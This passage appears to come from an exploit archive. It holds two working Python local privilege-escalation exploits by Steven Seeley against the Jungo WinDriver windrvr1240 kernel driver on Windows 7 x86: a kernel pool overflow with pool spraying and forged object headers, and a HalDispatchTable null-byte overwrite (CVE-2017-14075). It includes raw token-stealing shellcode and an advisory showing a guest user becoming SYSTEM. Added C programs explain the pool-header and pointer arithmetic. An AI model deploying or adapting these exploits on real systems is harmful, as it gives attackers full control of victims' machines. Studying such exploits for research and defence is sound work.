    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(null_size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) error while allocating the null paged memory: %s" % dwStatus
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))
    if write == 0:
        print "(-) error while writing our junk to the null paged memory: %s" % write
        return False
    return True
def we_can_spray():
    """
    Spray the Kernel Pool with IoCompletionReserve and Event Objects.
    The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
    These are allocated from the Nonpaged kernel pool.
    """
    handles = []
    IO_COMPLETION_OBJECT = 1
    for i in range(0, 25000):
        handles.append(windll.kernel32.CreateEventA(0,0,0,0))
        hHandle = HANDLE(0)
        handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))
    # could do with some better validation
    if len(handles) > 0:
        return True
    return False
def alloc_pool_overflow_buffer(base, input_size):
    """
    Craft our special buffer to trigger the overflow.
    """
    print "(+) allocating pool overflow input buffer"
    baseadd = c_int(base)
    size = c_int(input_size)
    input = "\x41" * 0x18                               # offset to size
    input += struct.pack("<I", 0x0000008d)              # controlled size (this triggers the overflow)
    input += "\x42" * (0x90-len(input))                 # padding to survive bsod
    input += struct.pack("<I", 0x00000000)              # use a NULL dword for sub_4196CA
    input += "\x43" * ((0x460-0x8)-len(input))          # fill our pool buffer
    # repair the allocated chunk header...
    input += struct.pack("<I", 0x040c008c)              # _POOL_HEADER
    input += struct.pack("<I", 0xef436f49)              # _POOL_HEADER (PoolTag)
    input += struct.pack("<I", 0x00000000)              # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x0000005c)              # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x00000000)              # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x00000000)              # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x00000001)              # _OBJECT_HEADER (PointerCount)
    input += struct.pack("<I", 0x00000001)              # _OBJECT_HEADER (HandleCount)
    input += struct.pack("<I", 0x00000000)              # _OBJECT_HEADER (Lock)
    input += struct.pack("<I", 0x00080000)              # _OBJECT_HEADER (TypeIndex)
    input += struct.pack("<I", 0x00000000)              # _OBJECT_HEADER (ObjectCreateInfo)
    # filler
    input += "\x44" * (input_size-len(input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
    if write == 0:
        print "(-) error while writing our input buffer memory: %s" % write
        return False
    return True
def we_can_trigger_the_pool_overflow():
    """
    This triggers the pool overflow vulnerability using a buffer of size 0x460.
    """
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE_NAME = "\\\\.\\WinDrvr1240"
    dwReturn = c_ulong()
    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    inputbuffer = 0x41414141
    inputbuffer_size = 0x5000
    outputbuffer_size = 0x5000
    outputbuffer = 0x20000000
    alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)
    IoStatusBlock = c_ulong()
    if driver_handle:
        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,
                                                inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)
        return True
    return False

def we_can_make_pool_holes():
    """
    This makes the pool holes that will coalesce into a hole of size 0x460.
    """
    global khandlesd
    mypid = os.getpid()
    khandlesd = {}
    khandlesl = []
    # leak kernel handles
    for pid, handle, obj in get_handles():
        # mixed object attack
        if pid == mypid and (get_type_info(handle) == "Event" or get_type_info(handle) == "IoCompletionReserve"):
            khandlesd[obj] = handle
            khandlesl.append(obj)
    # Find holes and make our allocation
    holes = []
    for obj in khandlesl:
        # obj address is the object body address, but we want the allocation
        # address, so we just remove the size of the headers from it.
        alloc = obj - 0x30
        # Get allocations at beginning of the page
        if (alloc & 0xfffff000) == alloc:
            bin = []
            # object sizes
            CreateEvent_size = 0x40
            IoCompletionReserve_size = 0x60
            combined_size = CreateEvent_size + IoCompletionReserve_size
            # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object
            offset = IoCompletionReserve_size
            # seven adjacent (IoCompletionReserve, Event) pairs: 7 * 0xa0 == 0x460
            for i in range(offset, offset + (7 * combined_size), combined_size):
                try:
                    # chunks need to be next to each other for the coalesce to take effect
                    bin.append(khandlesd[obj + i])
                    bin.append(khandlesd[obj + i - IoCompletionReserve_size])
                except KeyError:
                    pass
            # make sure it's contiguously allocated memory
            if len(tuple(bin)) == 14:
                holes.append(tuple(bin))
    # make the holes to fill
    for hole in holes:
        for handle in hole:
            kernel32.CloseHandle(handle)
    return True

def trigger_lpe():
    """
    This function frees the IoCompletionReserve objects, which triggers the
    registered OkayToCloseProcedure, a pointer we control.
    """
    # free the corrupted chunk to trigger OkayToCloseProcedure
    for k, v in khandlesd.iteritems():
        kernel32.CloseHandle(v)
    os.system("cmd.exe")

def main():
    print "\n\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]"
    print "\t   Steven Seeley (mr_me) of Source Incite\r\n"
    if release() != "7" or architecture()[0] != "32bit":
        print "(-) although this exploit may work on this system,"
        print "    it was only designed for Windows 7 x86."
        sys.exit(-1)
    print "(+) spraying pool with mixed objects..."
    if we_can_spray():
        print "(+) sprayed the pool!"
        print "(+) making pool holes..."
        if we_can_make_pool_holes():
            print "(+) made the pool holes!"
            print "(+) allocating shellcode..."
            if we_can_alloc_shellcode():
                print "(+) allocated the shellcode!"
                print "(+) triggering pool overflow..."
                if we_can_trigger_the_pool_overflow():
                    print "(+) elevating privileges!"
                    trigger_lpe()

if __name__ == '__main__':
    main()
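The header bytes that alloc_pool_overflow_buffer() writes back over the neighbouring chunk, and the sizes that we_can_spray() and we_can_make_pool_holes() depend on, are easier to check with a decoder than by eye. The following C program is an added example of mine, not code from the exploit or from Jungo; it decodes the two _POOL_HEADER dwords from the exploit (0x040c008c and 0xef436f49) and checks the arithmetic behind the 0x460 hole. The Win7 x86 _POOL_HEADER bit layout, the 0x18-byte _OBJECT_HEADER and the WDK PROTECTED_POOL constant are my assumptions about the target build, not values stated on the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Windows 7 x86 _POOL_HEADER (8 bytes; sizes are in 8-byte units), assumed:
 *   +0x000 PreviousSize : 9 bits   +0x000 PoolIndex : 7 bits
 *   +0x002 BlockSize    : 9 bits   +0x002 PoolType  : 7 bits
 *   +0x004 PoolTag
 * The 0x18-byte _OBJECT_HEADER below is also an assumption about Win7 x86. */
#define POOL_HEADER_SIZE          0x8
#define QUOTA_INFO_SIZE           0x10          /* _OBJECT_HEADER_QUOTA_INFO: the four dwords the exploit writes */
#define OBJECT_HEADER_SIZE        0x18          /* Win7 x86 _OBJECT_HEADER; Body starts at +0x18 */
#define EVENT_SIZE                0x40          /* from the spray docstring */
#define IOCOMPLETIONRESERVE_SIZE  0x60          /* from the spray docstring */
#define OVERFLOW_CHUNK_SIZE       0x460         /* size of the chunk the driver overflows */
#define PROTECTED_POOL            0x80000000u   /* WDK constant: high bit of a pool tag */

typedef struct {
    unsigned previous_size;   /* 8-byte units */
    unsigned pool_index;
    unsigned block_size;      /* 8-byte units */
    unsigned pool_type;       /* 0 marks a free chunk */
    int      is_protected;    /* PROTECTED_POOL bit set: the tag is checked on free */
    char     tag[5];          /* ASCII tag with the protected bit stripped */
} pool_header_t;

static pool_header_t decode_pool_header(uint32_t ulong1, uint32_t pool_tag)
{
    pool_header_t h;
    uint32_t t = pool_tag & ~PROTECTED_POOL;
    h.previous_size = ulong1 & 0x1ff;
    h.pool_index    = (ulong1 >> 9) & 0x7f;
    h.block_size    = (ulong1 >> 16) & 0x1ff;
    h.pool_type     = (ulong1 >> 25) & 0x7f;
    h.is_protected  = (pool_tag & PROTECTED_POOL) != 0;
    for (int i = 0; i < 4; i++)
        h.tag[i] = (char)((t >> (8 * i)) & 0xff);
    h.tag[4] = '\0';
    return h;
}

static unsigned chunk_bytes(unsigned units) { return units * 8; }

static int tag_matches(uint32_t pool_tag, const char *expected)
{
    pool_header_t h = decode_pool_header(0, pool_tag);
    return strcmp(h.tag, expected) == 0;
}

/* Offset in the input buffer at which the neighbour's header is rewritten:
 * the exploit fills 0x460 - 0x8 bytes and then emits the header. */
static unsigned neighbour_header_offset(void)
{
    return OVERFLOW_CHUNK_SIZE - POOL_HEADER_SIZE;                  /* 0x458 */
}

/* Object body address minus allocation start: the obj - 0x30 in we_can_make_pool_holes(). */
static unsigned body_to_alloc_delta(void)
{
    return POOL_HEADER_SIZE + QUOTA_INFO_SIZE + OBJECT_HEADER_SIZE;  /* 0x30 */
}

/* Hole left by freeing n adjacent (IoCompletionReserve, Event) pairs. */
static unsigned hole_bytes(unsigned pairs)
{
    return pairs * (IOCOMPLETIONRESERVE_SIZE + EVENT_SIZE);
}

/* The repaired header must describe the neighbour the spray put there:
 * previous chunk 0x460 bytes (ours), this chunk 0x60 bytes, in use, tagged IoCo. */
static int header_consistent(uint32_t ulong1, uint32_t pool_tag)
{
    pool_header_t h = decode_pool_header(ulong1, pool_tag);
    return chunk_bytes(h.previous_size) == OVERFLOW_CHUNK_SIZE
        && chunk_bytes(h.block_size) == IOCOMPLETIONRESERVE_SIZE
        && h.pool_type != 0
        && strcmp(h.tag, "IoCo") == 0;
}

int main(void)
{
    /* the two header dwords from alloc_pool_overflow_buffer() */
    pool_header_t h = decode_pool_header(0x040c008cu, 0xef436f49u);
    printf("PreviousSize 0x%x (0x%x bytes)  BlockSize 0x%x (0x%x bytes)  PoolIndex %u  PoolType %u\n",
           h.previous_size, chunk_bytes(h.previous_size), h.block_size, chunk_bytes(h.block_size),
           h.pool_index, h.pool_type);
    printf("PoolTag '%s'%s\n", h.tag, h.is_protected ? " (protected)" : "");
    printf("header offset in input 0x%x, body-to-alloc delta 0x%x, hole from 7 pairs 0x%x, consistent: %d\n",
           neighbour_header_offset(), body_to_alloc_delta(), hole_bytes(7),
           header_consistent(0x040c008cu, 0xef436f49u));
    return 0;
}
```

Decoding 0x040c008c gives PreviousSize 0x8c (0x460 bytes, the overflowing chunk) and BlockSize 0xc (0x60 bytes, an IoCompletionReserve object), so the repaired header describes exactly the neighbour the spray placed after the hole, and the tag decodes to "IoCo" with the protected bit still set. The hole itself is seven adjacent 0x60 + 0x40 pairs because 7 * 0xa0 is 0x460, and the 0x30 subtracted from each object address is the pool header plus the quota block plus the object header that the exploit rewrites.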

platforms/windows/local/42625.py Executable file

@@ -0,0 +1,320 @@
# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Out-of-Bounds Write Privilege Escalation Vulnerability
Download: http://www.jungo.com/st/products/windriver/
File: WD1240.EXE
Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver: windrvr1240.sys
Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE: CVE-2017-14075
Author: Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks: b33f and sickness
Summary:
========
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of IOCTL 0x953824a7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data, which can result in an out-of-bounds write condition. An attacker can leverage this vulnerability to execute arbitrary code in the context of the kernel.
Vulnerability:
==============
The vulnerability occurs in sub_405644 at loc_4056CD:
    .text:004056CD loc_4056CD:                             ; CODE XREF: sub_405644+6A
    .text:004056CD                 mov     eax, [ebx]
    .text:004056CF                 xor     edx, edx
    .text:004056D1                 mov     byte ptr [edi+eax], 0   ; null byte write
    .text:004056D5                 mov     eax, P
    .text:004056DA                 add     [eax+880h], edi         ; offset HalDispatchTable[1]+0x880 is null and writable
Exploitation:
=============
At 0x004056da there is a second write, but since HalDispatchTable[1]+0x880 points to a null dword in a writable location, no memory is modified other than by our null byte write at 0x004056d1.
Since we control the address of that null byte write, we can keep calling the vulnerable IOCTL and zero the upper bytes of the HalDispatchTable[1] pointer one at a time, pushing the kernel pointer down until it lands in userland. Two bytes would have been enough, but I chose three for reliability.
Finally, the shellcode repairs the HalDispatchTable[1] pointer by reading HalDispatchTable[2], subtracting the fixed distance (0x912) between the two routines it points to, and writing the correct pointer back into the HalDispatchTable.
Timeline:
=========
2017-08-22 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 No response from Jungo and two bounced emails
2017-08-26 Attempted a follow up with the vendor via website chat
2017-08-26 No response via the website chat
2017-09-03 Received an email from a Jungo representative stating that they are "looking into it"
2017-09-03 Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 No response from Jungo
2017-09-06 Public 0day release of advisory
Example:
========
C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
       NT AUTHORITY\SYSTEM:(I)(F)
       BUILTIN\Administrators:(I)(F)
       BUILTIN\Users:(I)(F)
       Mandatory Label\Low Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Guest\Desktop>whoami
debugee\guest
C:\Users\Guest\Desktop>poc.py
--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
Steven Seeley (mr_me) of Source Incite
(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Guest\Desktop>whoami
nt authority\system
C:\Users\Guest\Desktop>
"""
import os
import sys
import struct
from ctypes import *
from ctypes.wintypes import *
from platform import release, architecture

kernel32 = windll.kernel32
ntdll = windll.ntdll

# GLOBAL VARIABLES
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0

class SYSTEM_MODULE_INFORMATION(Structure):
    _fields_ = [("Reserved", c_void_p * 3),        # this has an extra c_void_p because the first 4 bytes = number of return entries.
                ("ImageBase", c_void_p),           # it's not actually part of the structure, but we are aligning it.
                ("ImageSize", c_ulong),
                ("Flags", c_ulong),
                ("LoadOrderIndex", c_ushort),
                ("InitOrderIndex", c_ushort),
                ("LoadCount", c_ushort),
                ("ModuleNameOffset", c_ushort),
                ("FullPathName", c_char * 256)]

def alloc_shellcode(base, input_size, HalDispatchTable1):
    """
    allocates some shellcode
    """
    print "(+) allocating shellcode @ 0x%x" % base
    baseadd = c_int(base)
    size = c_int(input_size)
    # get the repair address
    HalDispatchTable2 = struct.pack("<I", HalDispatchTable1+0x4)
    # --[ setup]
    input = "\x60"                                  # pushad
    input += "\x64\xA1\x24\x01\x00\x00"             # mov eax, fs:[KTHREAD_OFFSET]
    input += "\x8B\x40\x50"                         # mov eax, [eax + EPROCESS_OFFSET]
    input += "\x89\xC1"                             # mov ecx, eax (Current _EPROCESS structure)
    input += "\x8B\x98\xF8\x00\x00\x00"             # mov ebx, [eax + TOKEN_OFFSET]
    # --[ copy system PID token]
    input += "\xBA\x04\x00\x00\x00"                 # mov edx, 4 (SYSTEM PID)
    input += "\x8B\x80\xB8\x00\x00\x00"             # mov eax, [eax + FLINK_OFFSET]  <-|
    input += "\x2d\xB8\x00\x00\x00"                 # sub eax, FLINK_OFFSET            |
    input += "\x39\x90\xB4\x00\x00\x00"             # cmp [eax + PID_OFFSET], edx      |
    input += "\x75\xed"                             # jnz                            ->|
    input += "\x8B\x90\xF8\x00\x00\x00"             # mov edx, [eax + TOKEN_OFFSET]
    input += "\x89\x91\xF8\x00\x00\x00"             # mov [ecx + TOKEN_OFFSET], edx
    # --[ recover]
    input += "\xbe" + HalDispatchTable2             # mov esi, HalDispatchTable[2]
    input += "\x8b\x16"                             # mov edx, [esi]
    input += "\x81\xea\x12\x09\x00\x00"             # sub edx, 0x912
    input += "\x83\xee\x04"                         # sub esi, 0x4
    input += "\x89\x16"                             # mov [esi], edx
    input += "\x61"                                 # popad
    input += "\xC3"                                 # ret
    input += "\xcc" * (input_size-len(input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
    if write == 0:
        print "(-) Error while writing our input buffer memory: %s" % write
        return False
    return True

def alloc(base, input_size):
    """
    Just allocates things.
    """
    baseadd = c_int(base)
    size = c_int(input_size)
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    return True

def mymemset(base, location, size):
    """
    A cheap memset ¯\_(ツ)_/¯
    """
    input = location * (size/len(location))
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xFFFFFFFF, base, input, len(input), byref(written))
    if write == 0:
        print "(-) Error while writing our input buffer memory: %s" % write
        return False
    return True

def get_HALDispatchTable_kernel_address():
    """
    This function gets the HALDispatchTable's kernel address
    """
    # allocate arbitrary buffer and call NtQuerySystemInformation
    b = create_string_buffer(0)
    systeminformationlength = c_ulong(0)
    res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))
    # call NtQuerySystemInformation second time with right size
    b = create_string_buffer(systeminformationlength.value)
    res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))
    # marshal raw bytes for 1st entry
    smi = SYSTEM_MODULE_INFORMATION()
    memmove(addressof(smi), b, sizeof(smi))
    # get kernel image name
    kernelImage = smi.FullPathName.split('\\')[-1]
    print "(+) found %s kernel base address: 0x%x" % (kernelImage, smi.ImageBase)
    # load kernel image in userland and get HAL Dispatch Table offset
    hKernelImage = kernel32.LoadLibraryA(kernelImage)
    print "(+) loading %s in userland" % kernelImage
    print "(+) found %s Userland Base Address : 0x%x" % (kernelImage, hKernelImage)
    hdt_user_address = kernel32.GetProcAddress(hKernelImage,"HalDispatchTable")
    print "(+) found HalDispatchTable userland base address: 0x%x" % hdt_user_address
    # calculate HAL Dispatch Table offset in kernel land
    hdt_kernel_address = smi.ImageBase + ( hdt_user_address - hKernelImage)
    print "(+) found HalDispatchTable kernel base address: 0x%x" % hdt_kernel_address
    return hdt_kernel_address

def write_one_null_byte(HWD, in_buffer, location):
    """
    The primitive function
    """
    mymemset(in_buffer, location, 0x1000)
    if HWD:
        IoStatusBlock = c_ulong()
        dev_ioctl = ntdll.ZwDeviceIoControlFile(HWD,
                                                None,
                                                None,
                                                None,
                                                byref(IoStatusBlock),
                                                0x953824a7,     # target
                                                in_buffer,      # special buffer
                                                0x1000,         # just the size to trigger with
                                                0x20000000,     # whateva
                                                0x1000          # whateva
                                                )
        # we could check dev_ioctl here I guess
        return True
    return False

def we_can_elevate(h, in_buffer, base):
    """
    This just performs the writes...
    """
    # get location of first byte write
    where2write = struct.pack("<I", base + 0x3)
    print "(+) triggering the first null byte write..."
    if write_one_null_byte(h, in_buffer, where2write):
        # get the location of the second byte write
        where2write = struct.pack("<I", base + 0x2)
        print "(+) triggering the second null byte write..."
        if write_one_null_byte(h, in_buffer, where2write):
            # get the location of the third byte write
            where2write = struct.pack("<I", base + 0x1)
            print "(+) triggering the third null byte write..."
            if write_one_null_byte(h, in_buffer, where2write):
                # eop
                print "(+) calling NtQueryIntervalProfile to elevate"
                arb = c_ulong(0)
                ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
                return True
    return False

def main():
    print "\n\t--[ Jungo DriverWizard WinDriver Kernel Write EoP exploit ]"
    print "\t   Steven Seeley (mr_me) of Source Incite\r\n"
    # the shellcode offsets are Windows 7 x86 only, so refuse anything else
    if release() != "7" or architecture()[0] != "32bit":
        print "(-) this exploit will only work for Windows 7 x86."
        print "    patch the shellcode for other windows versions."
        sys.exit(-1)
    print "(+) attacking target WinDrvr1240"
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE_NAME = "\\\\.\\WinDrvr1240"
    dwReturn = c_ulong()
    h = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    # get the address of the second entry, HalDispatchTable[1]
    base = get_HALDispatchTable_kernel_address() + 0x4
    # create some shellcode that patches the HalDispatchTable[1]
    if not alloc_shellcode(0x000000a2, 0x1000, base):
        print "(-) cannot allocate shellcode"
        sys.exit(-1)
    # alloc some memory
    in_buffer = 0x41414141
    in_size = 0x1000
    if not alloc(in_buffer, in_size):
        print "(-) cannot allocate target buffer"
        sys.exit(-1)
    if we_can_elevate(h, in_buffer, base):
        os.system('cmd.exe')
    else:
        print "(-) exploit failed!"

if __name__ == '__main__':
    main()
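The null-byte primitive is only useful because of the byte arithmetic in we_can_elevate() and the repair stub in alloc_shellcode(). The C program below is an added example of mine, not code from the exploit or from Jungo, that models both on a constructed 12-byte stand-in for HalDispatchTable. The starting pointer 0x82c7e4a2 is made up (only its low byte, 0xa2, matches the exploit's shellcode address), HalDispatchTable[2] is placed 0x912 past it so that the shellcode's repair delta holds, and real hal.dll values differ by build.

```c
#include <stdint.h>
#include <stdio.h>

#define REPAIR_DELTA    0x912u        /* sub edx, 0x912 in the recovery stub */
#define SHELLCODE_BASE  0x000000a2u   /* alloc_shellcode(0x000000a2, 0x1000, base) */
#define SHELLCODE_SIZE  0x1000u

/* Constructed stand-in for HalDispatchTable[0..2], kept as raw little-endian
 * bytes so the single-byte writes are explicit on any host. */
typedef struct { uint8_t raw[12]; } hdt_t;

static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* entry[1] is the pointer we corrupt; entry[2] is placed 0x912 past it, which is
 * what the shellcode's repair assumes. Values are made up, not from hal.dll. */
static hdt_t make_table(uint32_t entry1)
{
    hdt_t t;
    store_le32(&t.raw[0], 0x80000000u);            /* entry[0]: unused here */
    store_le32(&t.raw[4], entry1);
    store_le32(&t.raw[8], entry1 + REPAIR_DELTA);
    return t;
}

/* The primitive: mov byte ptr [edi+eax], 0, with the address supplied by our buffer. */
static void write_null_byte(hdt_t *t, unsigned where)
{
    t->raw[where] = 0;
}

/* Zero the top nbytes of entry[1], highest byte first (+3, then +2, then +1),
 * the order in which we_can_elevate() issues its IOCTLs. Returns the result. */
static uint32_t zero_upper_bytes(hdt_t *t, int nbytes)
{
    for (int i = 0; i < nbytes; i++)
        write_null_byte(t, 4 + 3 - i);
    return load_le32(&t->raw[4]);
}

/* Does the corrupted pointer fall inside the 0x1000 bytes mapped at 0?
 * (NtAllocateVirtualMemory rounds the requested base 0xa2 down to 0.) */
static int inside_shellcode_mapping(uint32_t p)
{
    uint32_t map_base = SHELLCODE_BASE & ~0xfffu;
    return p >= map_base && p < map_base + SHELLCODE_SIZE;
}

/* The recovery stub: entry[1] = entry[2] - 0x912. */
static uint32_t repair_entry1(hdt_t *t)
{
    store_le32(&t->raw[4], load_le32(&t->raw[8]) - REPAIR_DELTA);
    return load_le32(&t->raw[4]);
}

/* Convenience wrappers: entry[1] after n writes, and after the three writes plus repair. */
static uint32_t corrupt(uint32_t original, int nbytes)
{
    hdt_t t = make_table(original);
    return zero_upper_bytes(&t, nbytes);
}

static uint32_t corrupt_then_repair(uint32_t original)
{
    hdt_t t = make_table(original);
    zero_upper_bytes(&t, 3);
    return repair_entry1(&t);
}

int main(void)
{
    const uint32_t original = 0x82c7e4a2u;   /* constructed; only the low byte 0xa2 matters */
    for (int n = 1; n <= 3; n++) {
        uint32_t p = corrupt(original, n);
        printf("after %d null-byte write(s): HalDispatchTable[1] = 0x%08x, %s the shellcode mapping\n",
               n, p, inside_shellcode_mapping(p) ? "inside" : "outside");
    }
    printf("after repair: 0x%08x\n", corrupt_then_repair(original));
    return 0;
}
```

After two writes the pointer is 0x0000xxa2, which the 0x1000-byte mapping at address 0 only covers when the surviving byte is 0x00 to 0x0f; after three writes it is exactly 0x000000a2, the address the shellcode was written to, whatever the original pointer was. That is the reliability argument for the third IOCTL. The repair then only works if HalDispatchTable[2] really is 0x912 past the original HalDispatchTable[1] on the target, which is why the exploit is pinned to one Windows build.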